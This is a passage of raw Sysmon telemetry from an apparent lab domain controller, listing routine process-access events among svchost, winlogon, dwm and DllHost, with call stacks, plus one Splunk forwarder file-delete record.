09:21:44.952{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055336Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.952{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055335Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.952{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055334Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.952{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055333Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.952{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+f290|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001055332Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.952{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+f290|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001055331Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.952{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D26-6151-8600-00000000FD01}1288C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+37c3|c:\windows\system32\SYSNTFY.dll+1dcb|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49e78|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055330Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.952{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D26-6151-8600-00000000FD01}1288C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+48674|C:\Windows\System32\RPCRT4.dll+31850|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055329Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.952{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055328Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.952{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055327Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.952{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001055326Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.858{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=919826E4973B337CB1F6993DFF7B309E,SHA256=C7004F185D99483A8A18D495092D3C2E528469A10C807F4FDC0ADE375A6520D3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055325Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.842{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055324Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.842{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055323Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.842{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055322Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.827{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055321Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.827{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055320Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.827{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055319Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.827{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055318Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.827{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055317Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.827{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055316Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.827{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055315Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.827{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D27-6151-8800-00000000FD01}812C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055314Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.827{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D27-6151-8800-00000000FD01}812C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055313Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.780{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D28-6151-8900-00000000FD01}3220C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\K